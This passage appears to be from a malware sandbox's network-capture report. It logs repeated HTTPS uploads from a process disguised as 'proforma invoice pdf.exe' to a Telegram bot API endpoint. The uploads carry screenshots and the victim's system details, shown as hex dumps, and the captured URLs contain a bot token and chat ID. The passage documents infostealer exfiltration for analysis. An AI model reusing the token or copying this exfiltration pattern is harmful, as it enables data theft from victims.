e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:33:27 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:33:27 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:33:27 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:33:27 UTC	11878	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:33:27 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 35 38 63 39 38 38 35 32 39 64 36 38 2d 2d 0d 0a Data Ascii: -----------------------------8dd58c988529d68--
2025-01-08 11:33:28 UTC	1495	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:33:28 GMT Content-Type: application/json Content-Length: 1106 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138009,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736336007,"document":{"file_name":"user-116938 2025-03-01 14-01-15.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbGWd-Yod6YRZ5SZNZ_75NtnOhbwABmwACWhYAAj848VOxSTjNX337iwEAB20AAzYE","file_unique_id":"AQADWhYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbGWd-Yod6YRZ5SZNZ_75NtnOhbwABmwACWhYAAj848VOxSTjNX337iwEAB20AAzYE","file_unique_id":"AQADWhYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGxlnfmKHemEWeUmTWf--TbZzoW8AAZsAAloWAAI_OPFTsUk4zV99-4s2BA","file_unique_id":"AgADWhYAAj848VM","file_size":76835},"caption":"New SC Recovered!\n\nTime: 03/01/2025 13:51:14\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Add [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
21	192.168.2.7	49738	149.154.167.220	443	2608	C:\Users\user\Desktop\proforma invoice pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:34:01 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd63ccaf60e27a Host: api.telegram.org Content-Length: 77464 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:34:01 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:34:01 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 33 63 63 61 66 36 30 65 32 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 33 63 63 61 66 36 30 65 32 37 61 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 31 35 2f 32 30 32 35 20 31 34 3a 31 31 3a 33 32 0a 55 73 65 72 Data Ascii: -----------------------------8dd63ccaf60e27aContent-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd63ccaf60e27aContent-Disposition: form-data; name="caption"New SC Recovered!Time: 03/15/2025 14:11:32User
2025-01-08 11:34:01 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:34:01 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:34:01 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:34:01 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:34:01 UTC	11878	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
2025-01-08 11:34:01 UTC	50	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 33 63 63 61 66 36 30 65 32 37 61 2d 2d 0d 0a Data Ascii: -----------------------------8dd63ccaf60e27a--
2025-01-08 11:34:02 UTC	1491	IN	HTTP/1.1 200 OK Server: nginx/1.18.0 Date: Wed, 08 Jan 2025 11:34:01 GMT Content-Type: application/json Content-Length: 1102 Connection: close Strict-Transport-Security: max-age=31536000; includeSubDomains; preload Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, POST, OPTIONS Access-Control-Expose-Headers: Content-Length,Content-Type,Date,Server,Connection {"ok":true,"result":{"message_id":138010,"from":{"id":5145135161,"is_bot":true,"first_name":"U2origin","username":"U2originbot"},"chat":{"id":1279485009,"first_name":"Max","username":"zacsees","type":"private"},"date":1736336041,"document":{"file_name":"user-116938 2025-03-15 14-21-32.jpg","mime_type":"image/jpeg","thumbnail":{"file_id":"AAMCBAADGQMAAQIbGmd-YqnPirhqy1Pi_qFrpK4tHNSWAAJbFgACPzjxU4y-xsTWHK9MAQAHbQADNgQ","file_unique_id":"AQADWxYAAj848VNy","file_size":14215,"width":320,"height":256},"thumb":{"file_id":"AAMCBAADGQMAAQIbGmd-YqnPirhqy1Pi_qFrpK4tHNSWAAJbFgACPzjxU4y-xsTWHK9MAQAHbQADNgQ","file_unique_id":"AQADWxYAAj848VNy","file_size":14215,"width":320,"height":256},"file_id":"BQACAgQAAxkDAAECGxpnfmKpz4q4astT4v6ha6SuLRzUlgACWxYAAj848VOMvsbE1hyvTDYE","file_unique_id":"AgADWxYAAj848VM","file_size":76835},"caption":"New SC Recovered!\n\nTime: 03/15/2025 14:11:32\nUser Name: user/116938\nOSFullName: Microsoft Windows 10 Pro\nCPU: Intel(R) Core(TM)2 CPU 6600 @ 2.40 GHz\nRAM: 8191.25 MB\nIP Address [TRUNCATED]

Session ID	Source IP	Source Port	Destination IP	Destination Port	PID	Process
22	192.168.2.7	49739	149.154.167.220	443	2608	C:\Users\user\Desktop\proforma invoice pdf.exe

Timestamp	Bytes transferred	Direction	Data
2025-01-08 11:34:09 UTC	262	OUT	POST /bot5145135161:AAFnBnjYGtIUE_EwGqQ3-YIV1FOEItrzy8c/sendDocument HTTP/1.1 Content-Type: multipart/form-data; boundary=---------------------------8dd687e284089f6 Host: api.telegram.org Content-Length: 77457 Expect: 100-continue Connection: Keep-Alive
2025-01-08 11:34:09 UTC	25	IN	HTTP/1.1 100 Continue
2025-01-08 11:34:09 UTC	1024	OUT	Data Raw: 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 38 37 65 32 38 34 30 38 39 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 68 61 74 5f 69 64 22 0d 0a 0d 0a 31 32 37 39 34 38 35 30 30 39 0d 0a 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 2d 38 64 64 36 38 37 65 32 38 34 30 38 39 66 36 0d 0a 43 6f 6e 74 65 6e 74 2d 44 69 73 70 6f 73 69 74 69 6f 6e 3a 20 66 6f 72 6d 2d 64 61 74 61 3b 20 6e 61 6d 65 3d 22 63 61 70 74 69 6f 6e 22 0d 0a 0d 0a 4e 65 77 20 53 43 20 52 65 63 6f 76 65 72 65 64 21 0a 0a 54 69 6d 65 3a 20 30 33 2f 32 31 2f 32 30 32 35 20 31 33 3a 32 32 3a 30 30 0a 55 73 65 72 Data Ascii: -----------------------------8dd687e284089f6Content-Disposition: form-data; name="chat_id"1279485009-----------------------------8dd687e284089f6Content-Disposition: form-data; name="caption"New SC Recovered!Time: 03/21/2025 13:22:00User
2025-01-08 11:34:09 UTC	16355	OUT	Data Raw: 02 77 00 01 02 03 11 04 05 21 31 06 12 41 51 07 61 71 13 22 32 81 08 14 42 91 a1 b1 c1 09 23 33 52 f0 15 62 72 d1 0a 16 24 34 e1 25 f1 17 18 19 1a 26 27 28 29 2a 35 36 37 38 39 3a 43 44 45 46 47 48 49 4a 53 54 55 56 57 58 59 5a 63 64 65 66 67 68 69 6a 73 74 75 76 77 78 79 7a 82 83 84 85 86 87 88 89 8a 92 93 94 95 96 97 98 99 9a a2 a3 a4 a5 a6 a7 a8 a9 aa b2 b3 b4 b5 b6 b7 b8 b9 ba c2 c3 c4 c5 c6 c7 c8 c9 ca d2 d3 d4 d5 d6 d7 d8 d9 da e2 e3 e4 e5 e6 e7 e8 e9 ea f2 f3 f4 f5 f6 f7 f8 f9 fa ff da 00 0c 03 01 00 02 11 03 11 00 3f 00 8e 8a 28 af a7 3e 38 28 a9 e2 b4 9a 44 12 60 2c 67 a3 31 c0 3f d4 d4 cb 6b 0a fd e6 69 0f b7 03 ff 00 af fa 56 52 ab 08 ee cd 61 46 72 d9 14 68 ad 55 b5 b6 91 39 8b 6f ba b1 cf eb 9a 86 4d 34 f5 86 55 6f 66 f9 4f f8 52 8d 78 3f 22 Data Ascii: w!1AQaq"2B#3Rbr$4%&'()*56789:CDEFGHIJSTUVWXYZcdefghijstuvwxyz?(>8(D`,g1?kiVRaFrhU9oM4UofORx?"
2025-01-08 11:34:09 UTC	16355	OUT	Data Raw: b9 3d cd 74 c1 c3 2f ad 71 b7 9a 74 96 aa 1c f2 84 e0 13 c1 fc ab 47 40 93 3b a3 5b 86 ca 8c 98 9c 64 7d 54 f6 ab cd b0 f1 c4 c3 eb b4 e7 75 da df d7 e2 8d f0 b8 28 e1 69 7b 34 ee 2e a3 a4 b2 cf ba d8 65 1f 24 2f a1 f4 ac 8c 57 60 1c 37 07 d6 b9 ed 66 11 0e a0 c5 46 03 8d ff 00 e3 5d 79 36 65 3a ef d8 55 d5 a5 a3 f4 3e 7f 35 cb e3 41 7b 6a 7b 37 b1 42 8a 28 af a4 3c 20 a4 a5 a2 80 3b b9 60 0f f3 27 0d fc ea 01 90 70 7a 8a b8 6a 9b 1f de bf fb c6 bf 3d a8 96 e7 e8 11 24 53 5c 75 ff 00 fc 84 2e 7f eb ab 7f 33 5d 82 9a e3 ef ff 00 e4 21 73 ff 00 5d 5b f9 9a f6 f2 3f e2 4f d0 f1 33 af 82 1e a5 7a 28 a2 be 9c f9 b0 a2 8a 28 00 ae bf c2 1f f2 0b 97 fe bb 9f fd 05 6b 86 d4 3f d4 0f f7 bf c6 a4 7d 02 f1 75 1b 4b 20 f0 b3 dd 46 24 8d d4 9d b8 39 eb c7 b5 72 62 a0 Data Ascii: =t/qtG@;[d}Tu(i{4.e$/W`7fF]y6e:U>5A{j{7B(< ;`'pzj=$S\u.3]!s][?O3z((k?}uK F$9rb
2025-01-08 11:34:09 UTC	16355	OUT	Data Raw: 19 cc 7f 28 25 7a af 41 8f 97 1d 31 4e ba bd 96 5d 0e 4b 38 66 b6 0d b2 45 99 66 f3 f7 48 c5 89 0c bb 7e 42 71 8c 16 19 04 56 7f 5a 95 af ca 6c b0 10 e6 b3 9a 2e b7 c9 71 34 04 82 f0 b9 46 da 72 33 45 57 89 d6 6d 43 50 b8 8c ee 8a 69 d9 d0 e0 8c 82 7d 0d 58 ae 9a 32 73 a6 a5 2d ce 1a f0 8c 2a ca 31 d9 05 00 65 82 e5 57 82 c5 98 f0 aa 06 49 3f 40 28 a8 2e 37 06 8d 92 e4 5b 3a 92 56 56 04 80 71 df 00 9c 1e 9d 0f 5a aa 8d a8 b6 b7 26 94 54 a6 94 b6 25 8e 58 a4 0e eb 73 07 90 80 13 3e 5b 66 4f 41 8d bb b3 c1 e3 1d b3 d3 9a 52 51 49 66 9e 11 08 8f cd f3 f2 c5 36 e7 6f a6 ef bd c6 31 9a cf 73 67 2e eb 60 62 85 41 8a 53 32 44 c2 07 91 55 83 80 a0 6e 50 77 0c 7c bd 41 e0 03 45 c0 d9 35 a8 b5 d4 ad 52 24 85 fe 77 05 e3 90 b3 0d c8 d1 e0 b6 d1 81 8d cb 82 46 7d 2b Data Ascii: (%zA1N]K8fEfH~BqVZl.q4Fr3EWmCPi}X2s-*1eWI?@(.7[:VVqZ&T%Xs>[fOARQIf6o1sg.`bAS2DUnPw\|AE5R$wF}+
2025-01-08 11:34:09 UTC	15447	OUT	Data Raw: b2 af dd 0c 08 c3 63 b6 73 8a bb 45 4f d5 e9 f6 34 fa e5 7f e6 33 ee 2d ee ee e5 dd 37 92 ac d1 79 12 3a 2e 37 c7 90 42 ed fb aa 01 03 ee 81 4a f6 77 42 3b 78 a2 bc 2b 0d be f1 1a 15 07 68 71 86 c7 1d c1 35 7e 8a 5f 56 a5 6b 58 af af 57 bd f9 8a 31 59 dc 41 f6 5f 2a e7 06 d3 fd 43 6d 19 4e 73 8c e3 91 ec 78 a5 86 da ea d9 7f d1 ee 42 b3 4a b3 31 2a 0e 5d 49 20 fe 64 d5 da 2a bd 85 3e c4 7d 6a b7 f3 15 e0 8e e1 76 09 e6 12 2a 02 14 05 c6 32 49 3f a9 35 24 a8 64 51 b5 8a b2 90 ca c3 b1 1d 0d 49 45 5a 82 8a e5 46 52 a9 29 4b 9d bd 4c f6 b1 9d d6 f0 3d d1 3f 6d 60 d7 1c 0f de 10 72 33 f8 fa 52 a5 95 c4 6e ee 97 03 73 44 b0 90 c8 ac a5 17 01 41 52 30 71 81 cd 5f a2 b3 fa bd 2e c6 df 5c af fc c5 0f b1 5c ac 8f 32 5d 62 69 26 49 d9 8a 03 f3 a9 ca b0 c8 e3 19 ed Data Ascii: csEO43-7y:.7BJwB;x+hq5~_VkXW1YA_CmNsxBJ1]I d>}jv2I?5$dQIEZFR)KL=?m`r3RnsDAR0q_.\\2]bi&I
2025-01-08 11:34:09 UTC	11871	OUT	Data Raw: 09 0a e0 9e be c2 b1 f5 9b 09 35 00 25 8b 4f 9e 3b 91 c6 e2 d1 e1 87 a1 f9 ab 4a e7 51 48 27 68 8c b6 6a 57 1c 49 73 b1 ba 77 18 e2 9d 69 7c b7 32 94 59 6d 58 85 ce 21 9f 79 fc b0 38 ae 25 19 c7 de 47 44 9c 27 78 4b 53 83 07 20 1a 5a 6a fd d1 f4 a5 af 7e 2e f1 4c f8 f9 ab 49 a4 14 51 45 51 21 5d 3f 84 3f d5 5d 7f bc bf d6 b9 8a e9 bc 23 fe ae eb ea bf d6 b8 f1 bf c2 3d 1c b3 f8 ff 00 26 6b 7f 6b 69 bf f4 11 b5 ff 00 bf cb fe 34 7f 6a e9 bf f4 10 b5 ff 00 bf cb fe 35 5e da f6 1b 0f 0d 5a dc ce d8 44 b7 8f 8e e4 ed 18 03 de ad d9 5e 43 7d 66 97 50 b6 51 c6 79 ed ea 0d 79 8e 29 6b 67 6f eb c8 fa 05 36 f4 ba be ff 00 d6 a5 03 77 15 c5 cc b1 5b 4d 65 70 26 39 0b f6 81 93 f2 80 46 00 3e 95 cc ea 56 ff 00 65 be 92 1d a1 71 83 80 db 80 c8 cf 5c 0a ec 6f 4e 6e b4 Data Ascii: 5%O;JQH'hjWIswi\|2YmX!y8%GD'xKS Zj~.LIQEQ!]??]#=&kki4j5^ZD^C}fPQyy)kgo6w[Mep&9F>Veq\oNn
